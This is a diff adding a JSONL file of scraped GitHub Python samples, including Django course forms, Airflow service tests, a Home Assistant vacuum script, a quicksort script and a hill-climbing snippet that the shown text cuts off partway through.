diff --git "a/5397.jsonl" "b/5397.jsonl" new file mode 100644--- /dev/null +++ "b/5397.jsonl" @@ -0,0 +1,1511 @@ +{"seq_id":"1139556169","text":"# Vacuum a specific room\n\nroomConfig = {\n 16: [\"hallway\"],\n 17: [\"bedroom\"],\n 18: [\"entrance\"],\n 19: [\"kitchen\"],\n 20: [\"nursery\", \"kids room\"],\n 22: [\"living room\"],\n 23: [\"office\"] \n}\n\nentity_id = data.get(\"entity_id\")\narea = data.get(\"area\").lower()\n\nroomsToClean = []\n\nfor roomNumber, roomNames in roomConfig.items():\n for name in roomNames:\n if name in area: \n roomsToClean.append(int(roomNumber))\n continue\n\nif entity_id is not None and len(roomsToClean) > 0: \n service_data = {\"entity_id\": entity_id, \"command\": \"app_segment_clean\", \"params\": roomsToClean}\n hass.services.call(\"vacuum\", \"send_command\", service_data, False)\n","repo_name":"oscarb/home-assistant-config","sub_path":"python_scripts/vacuum_room.py","file_name":"vacuum_room.py","file_ext":"py","file_size_in_byte":690,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"29514198028","text":"#coding:utf-8\n\ndef get_export(packs, name):\n for k, v in packs.iteritems():\n if v.get('export') == name:\n return v\n\n\ndef get_comp(packs, id):\n for k, v in packs.iteritems():\n if v.get('id') == id:\n return v\n\n\ndef id_cmp(x, y):\n return cmp(int(x), int(y))\n\n\ndef show_sprite(tree, root, sprite, package):\n spr_type = sprite['type']\n if spr_type == 'animation':\n ids = sprite['component'].keys()\n ids.sort(id_cmp)\n for i in ids:\n comp = sprite['component'][i]\n id = comp.get('id')\n if id == '65535': # anchor\n name = comp['name']\n child = tree.AppendItem(root, name, ct_type=1)\n tree.CheckItem(child)\n d = tree.GetPyData(root)\n if d:\n n = [x for x in d]\n n.append(name)\n tree.SetPyData(child, n)\n else:\n ref = get_comp(package, id)\n name = comp.get('name', 'index_' + id)\n child = tree.AppendItem(root, name, ct_type=1)\n d = tree.GetPyData(root)\n if d:\n n = [x for x in d]\n n.append(int(i) - 1)\n tree.SetPyData(child, n)\n tree.CheckItem(child)\n\n ref_type = ref['type']\n if ref_type == 'animation':\n show_sprite(tree, child, ref, package)\n","repo_name":"rainfiel/ejoy2dx","sub_path":"tools/editor/pack_tree.py","file_name":"pack_tree.py","file_ext":"py","file_size_in_byte":1480,"program_lang":"python","lang":"en","doc_type":"code","stars":25,"dataset":"github-code","pt":"79"} +{"seq_id":"18941120754","text":"from django import forms\nfrom .forms_patient import TimeInput\nfrom hc.models import Appointment\n\n\nclass ViewAppointmentForm(forms.ModelForm):\n\n class Meta:\n model = Appointment\n fields = '__all__'\n widgets = {\n 'date': forms.SelectDateWidget(\n empty_label=(\"Choose Year\", \"Choose Month\", \"Choose Day\"),\n ),\n 'time': TimeInput(),\n }\n","repo_name":"vedthakur5/my","sub_path":"hc/forms/forms_receptionist.py","file_name":"forms_receptionist.py","file_ext":"py","file_size_in_byte":412,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"17678768242","text":"#imports forms\nfrom datetime import datetime, timedelta\n\nfrom django import forms\nfrom django.contrib.admin.widgets import AdminDateWidget\nfrom django.core.exceptions import ValidationError\nfrom django.db.models import Q\nfrom django.forms import extras\nfrom django.shortcuts import get_object_or_404\nfrom teamwork.apps.profiles.models import *\n\nfrom .models import *\n\n#Choices for term\nTerm_Choice = (('Winter', 'Winter'), 
('Spring', 'Spring'), ('Summer', 'Summer'),\n ('Fall', 'Fall'), )\n\nLower_Boundary_Choice = ((0, 'No Preference'), (2, '01:00'), (4, '02:00'), (6, '03:00'),\n (8, '04:00'), (10, '05:00'), (12, '06:00'), (14, '07:00'),\n (16, '08:00'), (18, '09:00'), (20, '10:00'), (22, '11:00'),\n (24, '12:00'), )\n\nUpper_Boundary_Choice = ((48, 'No Preference'), (26, '13:00'), (28, '14:00'), (30, '15:00'),\n (32, '16:00'), (34, '17:00'), (36, '18:00'), (38, '19:00'),\n (40, '20:00'), (42, '21:00'), (44, '22:00'), (46, '23:00'), )\n\ndef ForbiddenNamesValidator(value):\n forbidden_names = ['new', 'join', 'delete', 'create']\n\n if value.lower() in forbidden_names:\n raise ValidationError('This is a reserved word.')\n\n#Creates the course form\nclass CreateCourseForm(forms.ModelForm):\n \"\"\"\n Form used for a user to create a course.\n\n Attributes (Fields):\n name: [CharField] Course name field\n info: [CharField] Course information field\n term: [ChoiceField] List of possible terms\n slug: [CharField] Course slug\n students: [ModelMultipleChoiceField] List of students\n\n Methods:\n __init__ : Initializes form, filtering querysets for fields\n \"\"\"\n\n #Filters queryset based on conditions\n def __init__(self, uid, *args, **kwargs):\n super(CreateCourseForm, self).__init__(*args, **kwargs)\n\n #Renders slug as HiddenInput\n if 'instance' in kwargs:\n self.fields['slug'].widget = forms.HiddenInput()\n self.fields['term'].widget = forms.HiddenInput()\n else:\n self.fields['students'].widget = forms.HiddenInput()\n self.fields['limit_interest'].widget = forms.HiddenInput()\n\n self.fields['name'].validators.append(ForbiddenNamesValidator)\n\n #course name field\n name = forms.CharField(\n #Text input\n widget=forms.TextInput(attrs={'class': 'form-control'}),\n #With length 255\n max_length=255,\n #Field required\n required=True)\n\n #course info field\n info = forms.CharField(\n #Text input\n widget=forms.Textarea(attrs={'class': 'form-control'}),\n #With length 400\n max_length=400,\n #Field Required\n required=True)\n\n #Term field\n term = forms.ChoiceField(\n #Choices from Term_Choice\n choices=Term_Choice,\n #Field Required\n required=True)\n\n #Slug Field\n slug = forms.CharField(\n #Text Input\n widget=forms.TextInput(attrs={'class': 'form-control'}),\n #With Length 20\n max_length=20,\n #Field NOT Required\n required=False)\n\n #Students field\n students = forms.ModelMultipleChoiceField(\n #Multiple Choice Selection\n widget=forms.CheckboxSelectMultiple,\n #From all user objects\n queryset=User.objects.all(),\n #Field NOT Required\n required=False)\n\n #Field for only professor creating courses\n limit_creation = forms.BooleanField(\n #Initially field is false\n initial=False,\n #Labeled as \"Only professor can create projects?\"\n label='Only Professor can create projects?',\n #Field NOT Required\n required=False)\n\n limit_weights = forms.BooleanField(\n label=\"Limit projects to only use specified weights for matches\",\n required=False)\n\n weigh_interest = forms.IntegerField(\n min_value=0, max_value=5, label=\"Weight of user interest in project\",\n required=False)\n\n weigh_know = forms.IntegerField(\n min_value=0, max_value=5, label=\"Weight of skills users already know\",\n required=False)\n\n weigh_learn = forms.IntegerField(\n min_value=0, max_value=5, label=\"Weight of skills users want to learn\",\n required=False)\n\n limit_interest = forms.BooleanField(\n label=\"Disable ability for students to show interest in projects\",\n required=False)\n\n #META CLASS\n class Meta:\n model = 
Course\n fields = ['name', 'info', 'term', 'students', 'slug', 'limit_creation',\n 'weigh_interest', 'weigh_know', 'weigh_learn', 'limit_weights']\n\n\n#Edit the course form\nclass EditCourseForm(forms.ModelForm):\n \"\"\"\n Form used for a user to create a course.\n\n Attributes (Fields):\n name: [CharField] Course name field\n info: [CharField] Course information field\n term: [ChoiceField] List of possible terms\n slug: [CharField] Course slug\n students: [ModelMultipleChoiceField] List of students\n\n Methods:\n __init__ : Initializes form, filtering querysets for fields\n \"\"\"\n\n #Filters queryset based on conditions\n def __init__(self, uid, slug, *args, **kwargs):\n super(EditCourseForm, self).__init__(*args, **kwargs)\n\n curr_course = Course.objects.filter(slug=slug)\n students_in_course = Enrollment.objects.filter(course=curr_course)\n\n #Renders slug as HiddenInput\n if 'instance' in kwargs:\n self.fields['slug'].widget = forms.HiddenInput()\n self.fields['term'].widget = forms.HiddenInput()\n else:\n self.fields['limit_interest'].widget = forms.HiddenInput()\n\n # get_superuser_list\n superuser = User.objects.filter(is_superuser=True)\n self.fields['name'].validators.append(ForbiddenNamesValidator)\n\n #course name field\n name = forms.CharField(\n #Text input\n widget=forms.TextInput(attrs={'class': 'form-control'}),\n #With length 255\n max_length=255,\n #Field required\n required=True)\n\n #course info field\n info = forms.CharField(\n #Text input\n widget=forms.Textarea(attrs={'class': 'form-control'}),\n #With length 400\n max_length=400,\n #Field Required\n required=True)\n\n #Term field\n term = forms.ChoiceField(\n #Choices from Term_Choice\n choices=Term_Choice,\n #Field Required\n required=False)\n\n #Slug Field\n slug = forms.CharField(\n #Text Input\n widget=forms.TextInput(attrs={'class': 'form-control'}),\n #With Length 20\n max_length=20,\n #Field NOT Required\n required=False)\n\n #Field for only professor creating courses\n limit_creation = forms.BooleanField(\n #Initially field is false\n initial=False,\n #Labeled as \"Only professor can create projects?\"\n label='Only Professor can create projects?',\n #Field NOT Required\n required=False)\n\n limit_weights = forms.BooleanField(\n label=\"Limit projects to only use specified weights for matches\",\n required=False)\n\n weigh_interest = forms.IntegerField(\n min_value=0, max_value=5, label=\"Weight of user interest in project\",\n required=False)\n\n weigh_know = forms.IntegerField(\n min_value=0, max_value=5, label=\"Weight of skills users already know\",\n required=False)\n\n weigh_learn = forms.IntegerField(\n min_value=0, max_value=5, label=\"Weight of skills users want to learn\",\n required=False)\n\n limit_interest = forms.BooleanField(\n label=\"Disable ability for students to show interest in projects\",\n required=False)\n\n #META CLASS\n class Meta:\n model = Course\n fields = ['name', 'info', 'term', 'slug', 'limit_creation',\n 'weigh_interest', 'weigh_know', 'weigh_learn', 'limit_weights']\n\n\n#Creates join course form\nclass JoinCourseForm(forms.ModelForm):\n \"\"\"\n Form used for a user to join a course.\n\n Attributes (Fields):\n code: [CharField] field for user to enter addcode\n\n Methods:\n __init__ : Initializes form\n \"\"\"\n\n #Initializes form\n def __init__(self, uid, *args, **kwargs):\n super(JoinCourseForm, self).__init__(*args, **kwargs)\n\n #Add code field\n code = forms.CharField(\n #Text input\n widget=forms.TextInput(attrs={'class': 'form-control'}),\n #With max length 
255\n max_length=255)\n\n #META CLASS\n class Meta:\n model = Course\n fields = ['code']\n\n\ndef UniqueProjectValidator(value):\n if True:\n raise ValidationError('Each choice must be a Unique Project.')\n\n\n# Show Interest Form\nclass ShowInterestForm(forms.ModelForm):\n \"\"\"\n Form used for showing interest in sepcific projects.\n\n Attributes (Fields):\n projects-5: [ModelChoiceField] Project model\n pxr, x 1:5: [CharField] Reason for interest in project\n\n Methods:\n __init__ : gets the current course when initiating form, sets querysets\n clean: custom clean method for form validation\n \"\"\"\n\n #Initializes form\n def __init__(self, uid, *args, **kwargs):\n slug = kwargs.pop('slug')\n super(ShowInterestForm, self).__init__(*args, **kwargs)\n\n # Gets course with certain slug\n cur_course = Course.objects.prefetch_related('projects').get(slug=slug)\n\n # Gets all projects in that course\n projects = cur_course.projects.all().extra(\\\n select={'lower_title':'lower(title)'}).order_by('lower_title')\n\n self.fields['projects'].queryset = projects\n self.fields['projects2'].queryset = projects\n self.fields['projects3'].queryset = projects\n self.fields['projects4'].queryset = projects\n self.fields['projects5'].queryset = projects\n\n # Hides fields based on # projects in course\n if projects.count() < 5:\n self.fields['projects5'].widget = forms.HiddenInput()\n self.fields['p5r'].widget = forms.HiddenInput()\n if projects.count() < 4:\n self.fields['projects4'].widget = forms.HiddenInput()\n self.fields['p4r'].widget = forms.HiddenInput()\n if projects.count() < 3:\n self.fields['projects3'].widget = forms.HiddenInput()\n self.fields['p3r'].widget = forms.HiddenInput()\n if projects.count() < 2:\n self.fields['projects2'].widget = forms.HiddenInput()\n self.fields['p2r'].widget = forms.HiddenInput()\n if projects.count() < 1:\n self.fields['projects'].widget = forms.HiddenInput()\n self.fields['p1r'].widget = forms.HiddenInput()\n\n #Project Choice Field\n projects = forms.ModelChoiceField(\n queryset=None, empty_label=None, label='First Choice', required=False)\n p1r = forms.CharField(\n widget=forms.TextInput(attrs={'class': 'form-control'}),\n max_length=100,\n label='Reason',\n required=False)\n projects2 = forms.ModelChoiceField(\n queryset=None, empty_label=None, label='Second Choice', required=False)\n p2r = forms.CharField(\n widget=forms.TextInput(attrs={'class': 'form-control'}),\n max_length=100,\n label='Reason',\n required=False)\n projects3 = forms.ModelChoiceField(\n queryset=None, empty_label=None, label='Third Choice', required=False)\n p3r = forms.CharField(\n widget=forms.TextInput(attrs={'class': 'form-control'}),\n max_length=100,\n label='Reason',\n required=False)\n projects4 = forms.ModelChoiceField(\n queryset=None, empty_label=None, label='Fourth Choice', required=False)\n p4r = forms.CharField(\n widget=forms.TextInput(attrs={'class': 'form-control'}),\n max_length=100,\n label='Reason',\n required=False)\n projects5 = forms.ModelChoiceField(\n queryset=None, empty_label=None, label='Fifth Choice', required=False)\n p5r = forms.CharField(\n widget=forms.TextInput(attrs={'class': 'form-control'}),\n max_length=100,\n label='Reason',\n required=False)\n\n # Meta class\n class Meta:\n\n model = Course\n\n fields = ['projects']\n\n # Overrides clean_data for Show_Interest\n def clean(self):\n data = self.cleaned_data\n\n # Initializes a list of projects\n project_list = []\n # Gets data and adds to list\n p1 = data.get('projects')\n p2 = 
data.get('projects2')\n p3 = data.get('projects3')\n p4 = data.get('projects4')\n p5 = data.get('projects5')\n project_list.append(p1)\n project_list.append(p2)\n project_list.append(p3)\n project_list.append(p4)\n project_list.append(p5)\n\n # Filters None from project list for error checking\n project_list = list(filter(None, project_list))\n\n # Checks for uniqueness\n if len(project_list) != len(set(project_list)):\n self._errors['projects'] = self.error_class(\n ['Choices must be unique!'])\n #raise forms.ValidationError(\"Choices must be unique.\")\n\n return data\n\n\"\"\"\nForm used to simulate sending an email\n\n\"\"\"\nclass EmailRosterForm(forms.Form):\n def __init__(self, *args, **kwargs):\n super(EmailRosterForm, self).__init__(*args, **kwargs)\n\n subject = forms.CharField(\n widget=forms.TextInput(attrs={'class': 'form-control'}),\n max_length=255,\n required=True)\n\n content = forms.CharField(\n widget=forms.Textarea(attrs={'class': 'form-control'}), max_length=2000)\n\n\nclass CourseUpdateForm(forms.ModelForm):\n \"\"\"\n Form used for submitting project updates.\n\n Attributes (Fields):\n update_title: [CharField] Name of project update\n update: [CharField] Project update content\n user: [User] User object associated with form submitter\n\n Methods:\n __init__ : gets the current user when initiating the form\n \"\"\"\n\n # used for filtering the queryset\n def __init__(self, uid, *args, **kwargs):\n super(CourseUpdateForm, self).__init__(*args, **kwargs)\n creator = User.objects.get(id=uid)\n\n title = forms.CharField(\n widget=forms.TextInput(attrs={'class': 'form-control'}),\n max_length=255,\n required=True)\n\n content = forms.CharField(\n widget=forms.Textarea(attrs={'class': 'form-control'}), max_length=2000)\n\n class Meta:\n model = CourseUpdate\n fields = ['title', 'content']\n\nclass AssignmentForm(forms.ModelForm):\n \"\"\"Form used for making a new assignment.\"\"\"\n def __init__(self, uid, slug, *args, **kwargs):\n super(AssignmentForm, self).__init__(*args, **kwargs)\n creator = User.objects.get(id=uid)\n course= get_object_or_404(Course, slug=slug)\n assNum=len(course.assignments.all())\n self.fields['ass_number'].initial = assNum + 1\n\n # date assignment will start\n ass_date = forms.DateField(\n widget = extras.SelectDateWidget,\n input_formats = ['%Y-%m-%d'],\n label=\"Open Date\",\n initial=datetime.date.today()\n )\n # date assignment will end (users can no longer submit)\n due_date = forms.DateField(\n widget = extras.SelectDateWidget,\n input_formats = ['%Y-%m-%d'],\n initial=datetime.date.today() + timedelta(days=7)\n )\n\n # assignment name\n ass_name = forms.CharField(\n widget=forms.TextInput(attrs={'class': 'form-control'}),\n label=\"Assignment name\",\n required=True,\n max_length=255)\n\n # type of assignment, i.e. 
tsr\n ass_type = forms.CharField(\n max_length=255,\n label=\"Assignment Type\",\n required=True,\n initial='TSR')\n\n # assignment description\n description = forms.CharField(\n widget=forms.TextInput(attrs={'class': 'form-control'}),\n label=\"Assignment Description\",\n required=True,\n max_length=255)\n\n # number of assignment, first starts at 1\n ass_number = forms.DecimalField(\n widget=forms.NumberInput(),label='Assignment Number',\n max_digits=2,\n required=True,\n decimal_places=0\n )\n class Meta:\n model= Assignment\n widgets = {\n }\n\n fields = ['ass_date', 'due_date','ass_number','ass_type', 'ass_name','description']\n\n#Edit assignment form\nclass EditAssignmentForm(forms.ModelForm):\n \"\"\"form to edit ass.\"\"\"\n def __init__(self, uid, slug, *args, **kwargs):\n super(EditAssignmentForm, self).__init__(*args, **kwargs)\n creator = User.objects.get(id=uid)\n\n # date assignment will start\n ass_date = forms.DateField(\n widget = extras.SelectDateWidget,\n input_formats = ['%Y-%m-%d'],\n label=\"Open Date\",\n initial=datetime.date.today()\n )\n # date assignment will end (users can no longer submit)\n due_date = forms.DateField(\n widget = extras.SelectDateWidget,\n input_formats = ['%Y-%m-%d'],\n initial=datetime.date.today() + timedelta(days=7)\n )\n\n # assignment name\n ass_name = forms.CharField(\n widget=forms.TextInput(attrs={'class': 'form-control'}),\n label=\"Assignment name\",\n required=True,\n max_length=255)\n\n # type of assignment, i.e. tsr\n ass_type = forms.CharField(\n max_length=255,\n label=\"Assignment Type\",\n required=True,\n initial='TSR')\n\n # assignment description\n description = forms.CharField(\n widget=forms.TextInput(attrs={'class': 'form-control'}),\n label=\"Assignment Description\",\n required=True,\n max_length=255)\n\n # number of assignment, first starts at 1\n ass_number = forms.DecimalField(\n widget=forms.NumberInput(),label='Assignment Number',\n max_digits=2,\n required=True,\n decimal_places=0\n )\n class Meta:\n model= Assignment\n widgets = {\n }\n\n fields = ['ass_date', 'due_date','ass_number','ass_type', 'ass_name','description']\n\n\nclass ClaimProjectsForm(forms.Form):\n \"\"\"Form used for TA's to select their projects.\"\"\"\n\n def __init__(self, slug, *args, **kwargs):\n super(ClaimProjectsForm, self).__init__(*args, **kwargs)\n course = Course.objects.get(slug=slug)\n course_projects = course.projects.all()\n\n if len(course_projects) > 1:\n self.fields['all_projects'].choices = course_projects\n self.fields['all_projects'].widget = forms.SelectMultiple\n\n all_projects = forms.ChoiceField(\n label=\"All Projects\",\n required=False\n )\n\n claimed_projects = forms.ChoiceField(\n label=\"Claimed Projects\",\n required=False\n )\n\n class Meta:\n model = Course\n fields = ['all_projects', 'claimed_projects']\n","repo_name":"grepthink/grepthink","sub_path":"teamwork/apps/courses/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":18976,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"79"} +{"seq_id":"19330511630","text":"import time\n\nfrom concurrent import futures\nfrom oslo_log import log as logging\nfrom oslo_config import cfg\n\nLOG = logging.getLogger(__name__)\nCONF = cfg.CONF\n\n\ndef default_executor():\n thread_count = 5\n try:\n thread_count = CONF['service:worker'].threads\n except Exception:\n pass\n\n return futures.ThreadPoolExecutor(thread_count)\n\n\nclass Executor(object):\n \"\"\"\n Object to facilitate the running of a task, or a set 
of tasks on an\n executor that can map multiple tasks across a configurable number of\n threads\n \"\"\"\n def __init__(self, executor=None):\n self._executor = executor or default_executor()\n\n @staticmethod\n def do(task):\n return task()\n\n def task_name(self, task):\n if hasattr(task, 'task_name'):\n return str(task.task_name)\n if hasattr(task, 'func_name'):\n return str(task.func_name)\n return 'UnnamedTask'\n\n def run(self, tasks):\n \"\"\"\n Run task or set of tasks\n :param tasks: the task or tasks you want to execute in the\n executor's pool\n\n :return: The results of the tasks (list)\n\n If a single task is pass\n \"\"\"\n self.start_time = time.time()\n\n if callable(tasks):\n tasks = [tasks]\n results = [r for r in self._executor.map(self.do, tasks)]\n\n self.end_time = time.time()\n self.task_time = self.end_time - self.start_time\n\n task_names = [self.task_name(t) for t in tasks]\n LOG.debug(\"Finished Tasks %(tasks)s in %(time)fs\",\n {'tasks': task_names, 'time': self.task_time})\n\n return results\n","repo_name":"Woody89/designate-private","sub_path":"designate/worker/processing.py","file_name":"processing.py","file_ext":"py","file_size_in_byte":1658,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"} +{"seq_id":"72544203456","text":"\"\"\"Holds the session header and other global variables.\"\"\"\nfrom requests import Session\n\nNONCE = 1 # Counter that must always be increasing\nLOGGED_IN = False # Flag on whether or not the user is logged in.\nUSE_SANDBOX_URLS = False # Flag on whether or not to use sandbox urls.\nRETURN_PARSED_JSON_RESPONSE = False # Flag on whether to automatically parse request responses.\nSECRET_API_KEY = None\n\n# The session object for making get and post requests.\nSESSION = Session()\nSESSION.headers = {\n 'Content-Type': \"text/plain\",\n 'Content-Length': \"0\",\n 'Cache-Control': \"no-cache\"\n}","repo_name":"jmfernandes/robin_stocks","sub_path":"robin_stocks/gemini/globals.py","file_name":"globals.py","file_ext":"py","file_size_in_byte":585,"program_lang":"python","lang":"en","doc_type":"code","stars":1540,"dataset":"github-code","pt":"79"} +{"seq_id":"14317933345","text":"import random\n\n\ndef play():\n options = ['r', 'p', 's']\n user = input(\"write 'r' for rock, 'p' for paper, 's' for scissors: \")\n computer = random.choice(['r', 'p', 's'])\n # computer=random.choice(options)\n print(f\"computer chose {computer}\")\n if user == computer:\n return 'Its a tie'\n if is_win(user, computer):\n return 'You won!'\n\n return 'You lost'\n\n\ndef is_win(player, opponent):\n if (player == 'r' and opponent == 's') or (player == 's' and opponent == 'p') or (\n player == 'p' and opponent == 'r'):\n return True\n\n\nprint(play())\n","repo_name":"kfirbilu/Python","sub_path":"Rock Paper Scissors/rockPaperScissors.py","file_name":"rockPaperScissors.py","file_ext":"py","file_size_in_byte":591,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"79"} +{"seq_id":"23484441905","text":"from abc import ABC, abstractmethod\nfrom uuid import UUID\nfrom datetime import datetime\nfrom libs.schemas.message import (\n Message,\n)\n\n\nclass IMessageTable(ABC):\n @abstractmethod\n def connect(self) -> None: ...\n\n @abstractmethod\n def get_message(self,\n chat_id: UUID,\n message_timestamp: datetime) -> list[Message]: ...\n\n @abstractmethod\n def get_messages(self,\n chat_id: UUID,\n start_timestamp: datetime | None,\n end_timestamp: datetime | None) -> list[Message]: 
...\n\n @abstractmethod\n def create_message(self, message: Message) -> Message: ...\n","repo_name":"nikita-chekalinsky/chat-app","sub_path":"src/microservices/chats/app/services/db/message_table_interface.py","file_name":"message_table_interface.py","file_ext":"py","file_size_in_byte":672,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"32427535116","text":"# forms.py\nfrom django import forms\nfrom .models import User\n# from django.db.models import Q\n\n\nclass ShareThoughtForm(forms.Form):\n shared_with = forms.ModelMultipleChoiceField(\n queryset=User.objects.all(),\n widget=forms.CheckboxSelectMultiple,\n required=False, \n )\n\n # def __init__(self, *args, **kwargs):\n # user = kwargs.pop('user', None)\n # super(ShareThoughtForm, self).__init__(*args, **kwargs)\n \n # if user:\n # self.fields['shared_with'].queryset = User.objects.exclude( Q(id=user.id) | Q(is_superuser=True))\n","repo_name":"Knowledge-Streams-KS/thoughts-thought-streams","sub_path":"Thoughts/thought/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":588,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"72985320255","text":"import json\nimport os\nfrom pathlib import Path\nfrom composer.airflow import airflow_service\nfrom unittest import TestCase, mock, main\n\n\nclass MockResponse:\n def __init__(self, json_data, status_code, headers, text=None):\n self.json_data = json_data\n self.status_code = status_code\n self.headers = headers\n self.text = text\n\n def json(self):\n return self.json_data\n\n def headers(self):\n return self.headers\n\n def status_code(self):\n return self.status_code\n\n def text(self):\n return self.text\n\n\nclass AirflowServiceTests(TestCase):\n\n @mock.patch('google.auth.transport.requests.AuthorizedSession')\n @mock.patch('flask.Response')\n @mock.patch('requests.get')\n @mock.patch('six.moves.urllib.parse.parse_qs')\n def test_get_airflow_config(self, mock_six_parse, mock_requests_get, mock_flask_response, mock_auth_session):\n with open(os.path.join(os.path.dirname(Path(__file__)), 'airflow_config.json')) as json_file:\n airflow_config = json.load(json_file)\n\n # mock the objects\n mock_flask_response.json.return_value = airflow_config\n mock_six_parse.return_value = airflow_config['query_string']\n mock_auth_session.request.return_value = mock_flask_response\n headers = {\n 'location': airflow_config['query_string']['redirect_uri'][0]\n }\n mock_requests_get.return_value = MockResponse({}, 200, headers)\n\n airflow_svc = airflow_service.AirflowService(\n mock_auth_session,\n os.environ.get('PROJECT_ID'),\n os.environ.get('GCP_LOCATION'),\n os.environ.get('COMPOSER_ENVIRONMENT')\n )\n composer_config = airflow_svc.get_airflow_config()\n assert composer_config is not None\n assert 'name' in composer_config\n assert composer_config['name'] == airflow_config['name']\n assert 'uuid' in composer_config\n assert composer_config['uuid'] == airflow_config['uuid']\n assert 'dagGcsPrefix' in composer_config['config']\n assert composer_config['config']['dagGcsPrefix'] == airflow_config['config']['dagGcsPrefix']\n assert 'client_id' in composer_config['query_string']\n assert composer_config['query_string']['client_id'] == airflow_config['query_string']['client_id']\n\n @mock.patch('google.auth.transport.requests.AuthorizedSession')\n @mock.patch('flask.Response')\n @mock.patch('requests.get')\n @mock.patch('six.moves.urllib.parse.parse_qs')\n def 
test_get_airflow_dag_gcs(self, mock_six_parse, mock_requests_get, mock_flask_response, mock_auth_session):\n with open(os.path.join(os.path.dirname(Path(__file__)), 'airflow_config.json')) as json_file:\n airflow_config = json.load(json_file)\n\n # mock the objects\n mock_flask_response.json.return_value = airflow_config\n mock_six_parse.return_value = airflow_config['query_string']\n mock_auth_session.request.return_value = mock_flask_response\n headers = {\n 'location': airflow_config['query_string']['redirect_uri'][0]\n }\n mock_requests_get.return_value = MockResponse({}, 200, headers)\n\n airflow_svc = airflow_service.AirflowService(\n mock_auth_session,\n os.environ.get('PROJECT_ID'),\n os.environ.get('GCP_LOCATION'),\n os.environ.get('COMPOSER_ENVIRONMENT')\n )\n\n dag_gcs_path = airflow_svc.get_airflow_dag_gcs()\n assert dag_gcs_path is not None\n assert dag_gcs_path == 'gs://europe-west3-composer-1b28efe1-bucket/dags'\n\n @mock.patch('google.auth.transport.requests.AuthorizedSession')\n @mock.patch('flask.Response')\n @mock.patch('requests.get')\n @mock.patch('six.moves.urllib.parse.parse_qs')\n def test_get_airflow_experimental_api(self, mock_six_parse, mock_requests_get, mock_flask_response, mock_auth_session):\n with open(os.path.join(os.path.dirname(Path(__file__)), 'airflow_config.json')) as json_file:\n airflow_config = json.load(json_file)\n\n # mock the objects\n mock_flask_response.json.return_value = airflow_config\n mock_six_parse.return_value = airflow_config['query_string']\n mock_auth_session.request.return_value = mock_flask_response\n headers = {\n 'location': airflow_config['query_string']['redirect_uri'][0]\n }\n mock_requests_get.return_value = MockResponse({}, 200, headers)\n\n airflow_svc = airflow_service.AirflowService(\n mock_auth_session,\n os.environ.get('PROJECT_ID'),\n os.environ.get('GCP_LOCATION'),\n os.environ.get('COMPOSER_ENVIRONMENT')\n )\n\n airflow_ui, client_id = airflow_svc.get_airflow_experimental_api()\n assert airflow_ui is not None\n assert client_id is not None\n assert airflow_ui == 'https://sde120c7fa68ea00ep-tp.appspot.com/api/experimental'\n assert client_id == '401501771865-j04v42mav328ocngb267ts6mlh82j8uk.apps.googleusercontent.com'\n\n @mock.patch('composer.utils.auth_service.get_id_token')\n @mock.patch('requests.request')\n def test_trigger_dag(self, mock_request, mock_auth_service):\n mock_auth_service.return_value = 'fake_id_token'\n mock_request.return_value = MockResponse({}, 200, {}, \"mock_response_text\")\n airflow_svc = airflow_service.AirflowService(\n 'fake_auth_session',\n os.environ.get('PROJECT_ID'),\n os.environ.get('GCP_LOCATION'),\n os.environ.get('COMPOSER_ENVIRONMENT')\n )\n res_text = airflow_svc.trigger_dag('mock_dag_name', 'mock_airflow_ui', ',mock_client_id')\n assert res_text is not None\n assert res_text == \"mock_response_text\"\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"damianmcdonald/composer-dag-dsl","sub_path":"composer-test/unit/airflow/airflow_service_test.py","file_name":"airflow_service_test.py","file_ext":"py","file_size_in_byte":5808,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"73734662975","text":"#快速排序算法,快排算法需要注意的是比较基准数大小需要送右边开始比较!!!\nimport time\nimport random\n#arr = [5,12,6,25,34,15,8,9,7,2,31,22,74]\narr = []\nfor i in range(0,999):\n arr.append(random.randrange(1 , round(time.time()/100),1))\ndef quicksort(left,right):\n if left > right:\n return\n a = arr[left]\n i = left\n j = right\n while i != j:\n while 
arr[j] >= a and i < j:\n j = j-1\n while arr[i] <= a and i < j:\n i = i+1\n if i < j:\n t = arr[i]\n arr[i] = arr[j]\n arr[j] = t\n \n arr[left] = arr[i]\n arr[i] = a \n quicksort(left,i-1)\n quicksort(i+1,right)\n\nquicksort(0,998)\n\nprint (arr)\n","repo_name":"brave-orange/python_learning","sub_path":"src/quicksort.py","file_name":"quicksort.py","file_ext":"py","file_size_in_byte":744,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"79"} +{"seq_id":"29793048651","text":"#Hill Climbing Algorithm\n\nfrom collections import defaultdict\n\nclass Graph:\n def __init__(self, total_vertices):\n global start\n self.graph = defaultdict(list)\n self.vertices = total_vertices\n self.explored = []\n self.total_cost = 0\n self.path_for_climbing = []\n\n def add_edge(self, u, v):\n self.graph[u].append(v)\n\n def add_all_edges(self):\n g.add_edge('A', 'B')\n g.add_edge('A', 'C')\n g.add_edge('A', 'D')\n g.add_edge('B', 'A')\n g.add_edge('B', 'C')\n g.add_edge('B', 'D')\n g.add_edge('C', 'A')\n g.add_edge('C', 'B')\n g.add_edge('C', 'D')\n g.add_edge('D', 'A')\n g.add_edge('D', 'B')\n g.add_edge('D', 'C')\n\n def add_values(self):\n actualValues = {'AB': 25, 'AD': 15, 'BD': 45, 'BC': 10, 'CD': 5, 'AC': 10, 'BA': 25, 'DA': 15, 'DB': 45,\n 'CB': 10, 'DC': 5, 'CA': 10, }\n\n def find_actual_path_value(self, optimal_path):\n for i in range(len(optimal_path)-1):\n self.total_cost += g.add_values([optimal_path[i]+optimal_path[i+1]])\n return self.total_cost\n\n def all_sol(self,explored, visited):\n 